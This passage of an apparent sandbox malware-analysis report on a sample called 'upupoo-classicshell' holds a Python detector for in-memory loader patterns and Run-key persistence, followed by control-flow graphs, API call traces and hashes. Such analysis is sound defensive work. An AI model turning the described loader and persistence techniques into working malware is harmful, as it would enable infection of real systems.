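    """Flag the loader pattern seen in this routine: a file is opened and read, and a
    buffer with an executable protection is allocated in the same function."""
    calls = [parse_api_line(line) for line in lines]
    apis = {c["api"] for c in calls}
    opens_and_reads = any(a.startswith("CreateFile") for a in apis) and "ReadFile" in apis
    findings = []
    for c in calls:
        if c["api"] != "VirtualAlloc":
            continue
        info = decode_virtualalloc(c)
        if info["executable"] and opens_and_reads:
            findings.append({
                "call_site": f"{c['ref']:08X}",
                "protect": info["protect"],
                "allocation": info["allocation"],
                "note": "file contents read into executable memory (in-memory loader pattern)",
            })
    return findings


def parse_string_id(string_id: str) -> Dict[str, Optional[str]]:
    """Split a '$'-joined String ID into the Run-key persistence triple: dropped
    binary path, Run subkey, value name. The hive is not in the string, so it is
    left for the analyst to confirm against the registry trace."""
    out: Dict[str, Optional[str]] = {"path": None, "run_key": None, "value_name": None}
    for part in string_id.split("$"):
        low = part.lower()
        if low.endswith((".exe", ".dll")) and ":\\" in part:
            out["path"] = part
        elif low.endswith((r"\currentversion\run", r"\currentversion\runonce")):
            out["run_key"] = part
        else:
            out["value_name"] = part
    return out


if __name__ == "__main__":
    for finding in find_rwx_file_load(SAMPLE_API_LINES):
        print(finding)
    print(parse_string_id(SAMPLE_STRING_ID))
```

The VirtualAlloc call records dwSize as 00000000 and the ReadFile handle as 00000000; those are the values the tracer captured, not proof that the allocation is empty, so the decoder reports them as-is and bases the finding only on the protection flag and the file-read APIs present in the same routine.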

Control-flow Graph (basic-block ranges and edges; the rendered graph is not reproduced here):
control_flow_graph 387 10003e03-10003e19 call 10004100 390 10003e25-10003e39 dllmain_raw 387->390 391 10003e1b-10003e1e 387->391 393 10003efd-10003f0b call 10004146 390->393 394 10003e3f-10003e50 dllmain_crt_dispatch 390->394 391->390 392 10003e20-10003e23 391->392 396 10003e56-10003e59 392->396 394->393 394->396 398 10003e62-10003e67 call 10001270 396->398 399 10003e5b-10003e61 call 10005e54 396->399 402 10003e6c-10003e74 398->402 399->398 404 10003ea1-10003ea3 402->404 405 10003e76-10003e78 402->405 408 10003eb0-10003eb3 404->408 409 10003ea5-10003eae call 10005ef0 404->409 406 10003e98-10003e9b 405->406 407 10003e7a-10003e93 call 10001270 dllmain_crt_dispatch dllmain_raw 405->407 406->404 411 10003e9d-10003e9f 406->411 407->406 408->393 413 10003eb5-10003ec6 dllmain_crt_dispatch 408->413 409->408 409->413 411->404 411->409 413->393 416 10003ec8-10003efa dllmain_raw 413->416 416->393
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: dllmain_crt_dispatchdllmain_raw
                                                                                                              • String ID:
                                                                                                              • API String ID: 1382799047-0
                                                                                                              • Opcode ID: 091da4a9f279b616c85709d655af715f6d372f82d33dfa22b276b6d253e67825
                                                                                                              • Instruction ID: 21d95cdbcc355bbce9694542adeadb8c5257880ba2f64f41f25c782f655f2304
                                                                                                              • Opcode Fuzzy Hash: 091da4a9f279b616c85709d655af715f6d372f82d33dfa22b276b6d253e67825
                                                                                                              • Instruction Fuzzy Hash: 91218376D006A6ABEB23CE64CC41D5F3BADEF45AD0B068A08FC156718EC7359C108B90

Control-flow Graph (basic-block ranges and edges; the rendered graph is not reproduced here):
control_flow_graph 418 6e0a8889-6e0a889f call 6e0a92d0 421 6e0a88ab-6e0a88bf dllmain_raw 418->421 422 6e0a88a1-6e0a88a4 418->422 424 6e0a8983-6e0a8991 call 6e0a9316 421->424 425 6e0a88c5-6e0a88d6 dllmain_crt_dispatch 421->425 422->421 423 6e0a88a6-6e0a88a9 422->423 426 6e0a88dc-6e0a88df 423->426 425->424 425->426 429 6e0a88e8-6e0a88fa call 6e0a7cd4 426->429 430 6e0a88e1-6e0a88e7 call 6e0ab1be 426->430 435 6e0a88fc-6e0a88fe 429->435 436 6e0a8927-6e0a8929 429->436 430->429 437 6e0a891e-6e0a8921 435->437 438 6e0a8900-6e0a8919 call 6e0a7cd4 dllmain_crt_dispatch dllmain_raw 435->438 439 6e0a892b-6e0a8934 call 6e0ab25a 436->439 440 6e0a8936-6e0a8939 436->440 437->436 442 6e0a8923-6e0a8925 437->442 438->437 439->440 444 6e0a893b-6e0a894c dllmain_crt_dispatch 439->444 440->424 440->444 442->436 442->439 444->424 447 6e0a894e-6e0a8980 dllmain_raw 444->447 447->424
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
• Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: dllmain_crt_dispatchdllmain_raw
                                                                                                              • String ID:
                                                                                                              • API String ID: 1382799047-0
                                                                                                              • Opcode ID: 3653de7113dac8de36feb4eacd6f8fac21c55bccb8f99008df797ff3e8caf61c
                                                                                                              • Instruction ID: 0f3da4d783d61ec33af2631b85bf7e63bd1acbb51ae98d3f0cbaeb28f311b044
                                                                                                              • Opcode Fuzzy Hash: 3653de7113dac8de36feb4eacd6f8fac21c55bccb8f99008df797ff3e8caf61c
                                                                                                              • Instruction Fuzzy Hash: 6B219172D0169EABCB718EED8C48B9F7A7DAE85790B090908FB2427117C73585108BB1

Control-flow Graph (basic-block ranges and edges; the rendered graph is not reproduced here):
control_flow_graph 465 6e0aba96-6e0aba9d call 6e0abaa4 468 6e0abaa3 465->468 469 6e0b0c15-6e0b0c1c call 6e0b3da5 465->469 468->469 472 6e0b0c1e-6e0b0c25 call 6e0b3e00 469->472 473 6e0b0c26-6e0b0c2d 469->473 472->473 475 6e0b0c2f-6e0b0c38 IsProcessorFeaturePresent 473->475 476 6e0b0c50-6e0b0c63 call 6e0b0384 473->476 477 6e0b0c3a-6e0b0c3d 475->477 478 6e0b0c3f-6e0b0c4d call 6e0b0fcb 475->478 484 6e0b0c6c-6e0b0c6e 476->484 485 6e0b0c65-6e0b0c6a 476->485 477->478 478->476 487 6e0b0c70 484->487 488 6e0b0c77-6e0b0c7a call 6e0b0dec 484->488 486 6e0b0c72 485->486 486->488 487->486 490 6e0b0c7f-6e0b0c95 call 6e0b0e49 488->490 493 6e0b0cc2-6e0b0cc5 490->493 494 6e0b0c97-6e0b0cbb call 6e0b0dec call 6e0b0e49 490->494 496 6e0b0cca-6e0b0cfd call 6e0b3078 493->496 494->493 504 6e0b0cbd-6e0b0cc1 494->504 502 6e0b0d08 496->502 503 6e0b0cff-6e0b0d02 496->503 506 6e0b0d0f-6e0b0d19 502->506 503->502 505 6e0b0d04-6e0b0d06 503->505 505->502 505->506 506->496 507 6e0b0d1b-6e0b0d1f 506->507
                                                                                                              APIs
                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,6E0B3214), ref: 6E0B0C31
                                                                                                              • _free.LIBCMT ref: 6E0B0C86
                                                                                                              • _free.LIBCMT ref: 6E0B0CAC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
• Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$FeaturePresentProcessor
                                                                                                              • String ID:
                                                                                                              • API String ID: 3633555280-0
                                                                                                              • Opcode ID: ba4d2fbae15ca3ad5081e93ee30111faf82de710b4e7508837dbdb8415f4579f
                                                                                                              • Instruction ID: bf1f2c95f2896931685d454eba996553c2285935839db7fb4946895d2abca8ff
                                                                                                              • Opcode Fuzzy Hash: ba4d2fbae15ca3ad5081e93ee30111faf82de710b4e7508837dbdb8415f4579f
                                                                                                              • Instruction Fuzzy Hash: 3111F970A4C705E6FF6017E59E5EB9A369CBB01B9CF402815FA14AF5C5FBF780408A90

Control-flow Graph (basic-block ranges and edges; the rendered graph is not reproduced here):
control_flow_graph 508 6e0b31be-6e0b31ec call 6e0b2e03 511 6e0b320f call 6e0b0c15 508->511 512 6e0b31ee-6e0b31fc 508->512 515 6e0b3214-6e0b323a 511->515 516 6e0b31fe-6e0b320c call 6e0a8161 512->516
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
• Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _abort
                                                                                                              • String ID: SystemFunction036
                                                                                                              • API String ID: 1888311480-2669272182
                                                                                                              • Opcode ID: 98f11a970e4af9c1ace46dbf07b1332f937c0032c8ea7f6df47aeaec8cbc378b
                                                                                                              • Instruction ID: 58b28ffca6c2b9af528f38f07efdd722804d68c27de7745382504c47fa907a97
                                                                                                              • Opcode Fuzzy Hash: 98f11a970e4af9c1ace46dbf07b1332f937c0032c8ea7f6df47aeaec8cbc378b
                                                                                                              • Instruction Fuzzy Hash: 23F0283264010C77CB14ABF8DC5DFAE3B94FB48B20F500469FA19DB241DA779C529695

Control-flow Graph (basic-block ranges and edges; the rendered graph is not reproduced here):
control_flow_graph 519 1000a60f-1000a61c call 10007e33 521 1000a621-1000a62c 519->521 522 1000a632-1000a63a 521->522 523 1000a62e-1000a630 521->523 524 1000a67a-1000a688 call 10007d68 522->524 525 1000a63c-1000a640 522->525 523->524 526 1000a642-1000a674 call 10008712 525->526 531 1000a676-1000a679 526->531 531->524
                                                                                                              APIs
                                                                                                                • Part of subcall function 10007E33: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,10008366,00000001,00000364,?,100079B7,00000001,00000001), ref: 10007E74
                                                                                                              • _free.LIBCMT ref: 1000A67B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 614378929-0
                                                                                                              • Opcode ID: 051ac04c7a2a016c856e79e1e88103d593c8fffb4ef1eb67d2c95586e15a8c45
                                                                                                              • Instruction ID: b7672c1c193f76610126873ccbb3ef6330c59d536c61a41d943e1f1b5bf89c15
                                                                                                              • Opcode Fuzzy Hash: 051ac04c7a2a016c856e79e1e88103d593c8fffb4ef1eb67d2c95586e15a8c45
                                                                                                              • Instruction Fuzzy Hash: CB0126766043456BF321CE69C845A5EFBE9FB8A2B0F25061DE58483280EA30AD45C764

Control-flow Graph (basic-block ranges and edges; the rendered graph is not reproduced here):
control_flow_graph 532 10007e33-10007e3e 533 10007e40-10007e4a 532->533 534 10007e4c-10007e52 532->534 533->534 535 10007e80-10007e8b call 100099da 533->535 536 10007e54-10007e55 534->536 537 10007e6b-10007e7c RtlAllocateHeap 534->537 542 10007e8d-10007e8f 535->542 536->537 538 10007e57-10007e5e call 100099ed 537->538 539 10007e7e 537->539 538->535 545 10007e60-10007e69 call 10007055 538->545 539->542 545->535 545->537
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,10008366,00000001,00000364,?,100079B7,00000001,00000001), ref: 10007E74
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: 8f0a5b2d5a03dd967ce427e314ddca8abef35719d25dea7ce93336d112499962
                                                                                                              • Instruction ID: c4940da44a0166de35659b096e3ad41ebd786e9953410b403eaffd371c36817b
                                                                                                              • Opcode Fuzzy Hash: 8f0a5b2d5a03dd967ce427e314ddca8abef35719d25dea7ce93336d112499962
                                                                                                              • Instruction Fuzzy Hash: B9F0B432E035A456FBA1DB66CC05B5B3799FB496E0B118195EC0CD719CCF28EC1186E1

Control-flow Graph (basic block -> successors; the executed/not-executed colouring of the original rendering is not preserved in this text)
• 6e0b0dec-6e0b0df7 -> 6e0b0df9-6e0b0e03, 6e0b0e05-6e0b0e0b
• 6e0b0df9-6e0b0e03 -> 6e0b0e05-6e0b0e0b, 6e0b0e39-6e0b0e44
• 6e0b0e05-6e0b0e0b -> 6e0b0e0d-6e0b0e0e, 6e0b0e24-6e0b0e35
• 6e0b0e0d-6e0b0e0e -> 6e0b0e24-6e0b0e35
• 6e0b0e24-6e0b0e35 (RtlAllocateHeap) -> 6e0b0e10-6e0b0e17, 6e0b0e37
• 6e0b0e10-6e0b0e17 (call 6e0b4274) -> 6e0b0e39-6e0b0e44, 6e0b0e19-6e0b0e22
• 6e0b0e19-6e0b0e22 (call 6e0b0b6f) -> 6e0b0e39-6e0b0e44, 6e0b0e24-6e0b0e35
• 6e0b0e37 -> 6e0b0e46-6e0b0e48
• 6e0b0e39-6e0b0e44 (call 6e0b1251) -> 6e0b0e46-6e0b0e48
• 6e0b0e46-6e0b0e48 (no successors)
The path RtlAllocateHeap -> call 6e0b4274 -> call 6e0b0b6f -> RtlAllocateHeap is a retry loop around the allocation; the graph has the same shape as the one at 10007e33 above.
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,6E0B16F0,00000001,00000364,?,6E0B0797,00000001,00000001), ref: 6E0B0E2D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
• Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: 30780cb4c099e496664ad3808f6db4cfd001669a1a8cd4365f2e721f19b3ec5e
                                                                                                              • Instruction ID: 365cd088cc4a4b3fbb0aab132f5fd59e2b970890b9e07cd3c93bd8f98fe2a3c8
                                                                                                              • Opcode Fuzzy Hash: 30780cb4c099e496664ad3808f6db4cfd001669a1a8cd4365f2e721f19b3ec5e
                                                                                                              • Instruction Fuzzy Hash: 1AF0B431608526EAEB511EE68A15B8F3B8DBF517A0F018511A838E7188FB72D80086E0
                                                                                                              APIs
                                                                                                              • __Thrd_sleep.LIBCPMT ref: 6E0A7825
                                                                                                                • Part of subcall function 6E0A9786: _xtime_get.LIBCPMT ref: 6E0A97A0
                                                                                                                • Part of subcall function 6E0A9786: __Xtime_diff_to_millis2.LIBCPMT ref: 6E0A97AC
                                                                                                                • Part of subcall function 6E0A9786: Sleep.KERNELBASE(00000000,00000000,0000000A,?,?,00000000,00000000), ref: 6E0A97B4
                                                                                                                • Part of subcall function 6E0A9786: _xtime_get.LIBCPMT ref: 6E0A97C0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
• Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _xtime_get$SleepThrd_sleepXtime_diff_to_millis2
                                                                                                              • String ID:
                                                                                                              • API String ID: 2593056502-0
                                                                                                              • Opcode ID: b9a1e2217b94dcc9645a8ba4431e82a94b88a20a9b2af4642cc346e7fa32a41b
                                                                                                              • Instruction ID: 476336b681e1cb57a4be278d5a4ff0980a7a4ff3e919598145ca185b7a8f9b3c
                                                                                                              • Opcode Fuzzy Hash: b9a1e2217b94dcc9645a8ba4431e82a94b88a20a9b2af4642cc346e7fa32a41b
                                                                                                              • Instruction Fuzzy Hash: DBE06532A0050DAB8F11DEE9D9459EF77BC9F45604B000565E905AB100EA72AB0587E5
                                                                                                              APIs
                                                                                                              • GetNativeSystemInfo.KERNELBASE ref: 6E0A1B63
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
• Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InfoNativeSystem
                                                                                                              • String ID:
                                                                                                              • API String ID: 1721193555-0
                                                                                                              • Opcode ID: 20b95d519748ff780f1622c17377a64ddebc94ff60fdbab2128e49514e72ee26
                                                                                                              • Instruction ID: 5e8f33da281f957842fe914e62bbbb8b3befc0d8447b53df8ed0d58a55f6e0d5
                                                                                                              • Opcode Fuzzy Hash: 20b95d519748ff780f1622c17377a64ddebc94ff60fdbab2128e49514e72ee26
                                                                                                              • Instruction Fuzzy Hash: F4F0BE31A10B098FCB14CF58CCC4AAD77B1FB88324B654764E824BB391DB39A8068B54
                                                                                                              APIs
• HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00C28E21 (flOptions 0, dwInitialSize 0x1000, dwMaximumSize 0: a growable private heap)
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 10892065-0
                                                                                                              • Opcode ID: a69911ee4eca0cea856faa472531139f516787ddc4c6cf65ede6764b5f916e79
                                                                                                              • Instruction ID: 671d50f333f28421f18ff520c5023d9a52b38337a19a2301b66dda6a47f77559
                                                                                                              • Opcode Fuzzy Hash: a69911ee4eca0cea856faa472531139f516787ddc4c6cf65ede6764b5f916e79
                                                                                                              • Instruction Fuzzy Hash: 0AD05E365A0349AEDB009F74BC0872A3BDCD784795F108436B94CC6190E670CA508500
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 6E0A700C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
• Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: cb5afb0462fcf4386f597e2ba64b36c52ce2b49e5e3f07010f8a98b0d5b68602
                                                                                                              • Instruction ID: 93a7289c1d805d86e32c26a9cd9f8f86c63d16910832422c1905768d583d2c31
                                                                                                              • Opcode Fuzzy Hash: cb5afb0462fcf4386f597e2ba64b36c52ce2b49e5e3f07010f8a98b0d5b68602
                                                                                                              • Instruction Fuzzy Hash: B6D06C31218206EFCB01DF98C89495ABBF1FF89314F00881CF29982220D631E858DF02
                                                                                                              APIs
• VirtualAlloc.KERNELBASE(?,?,00003000,00000004), ref: 6E0A1BDF (flAllocationType 0x3000 = MEM_COMMIT|MEM_RESERVE, flProtect 0x04 = PAGE_READWRITE)
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
• Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: 41f61bdd738d9ea3227fa55b3fa6bc12220ca752dee5e811021934163a0dc7e4
                                                                                                              • Instruction ID: fe0762982082dcdf1efd63416b047977efe83a90b74a45cbb52fc38a32444120
                                                                                                              • Opcode Fuzzy Hash: 41f61bdd738d9ea3227fa55b3fa6bc12220ca752dee5e811021934163a0dc7e4
                                                                                                              • Instruction Fuzzy Hash: ECE09231A416049FD724CF14CEC0B597BF6FF88704B558124E60197B45C730A807CF00
                                                                                                              APIs
• VirtualAlloc.KERNELBASE(?,?,00001000,00000004), ref: 6E0A2119 (flAllocationType 0x1000 = MEM_COMMIT only, flProtect 0x04 = PAGE_READWRITE)
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
• Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: 2ce0e580ddaf425a22a359fec3197a2f5c568aa5dcf9c41dcad8b2bef9960e27
                                                                                                              • Instruction ID: a55aae98c7009c4d8d6a12cac3fd10dcfa81df6d6fa3f1657798ac9215ab0bc5
                                                                                                              • Opcode Fuzzy Hash: 2ce0e580ddaf425a22a359fec3197a2f5c568aa5dcf9c41dcad8b2bef9960e27
                                                                                                              • Instruction Fuzzy Hash: 4CE0E575A01615AFCBA0CF68C988F9D7BF0AB4D764F15066CFA10EB381D631AC008F54
                                                                                                              APIs
• VirtualFree.KERNELBASE(?,?,00004000), ref: 6E0A6FCA (dwFreeType 0x4000 = MEM_DECOMMIT: the pages are decommitted but the reservation stays)
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
• Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
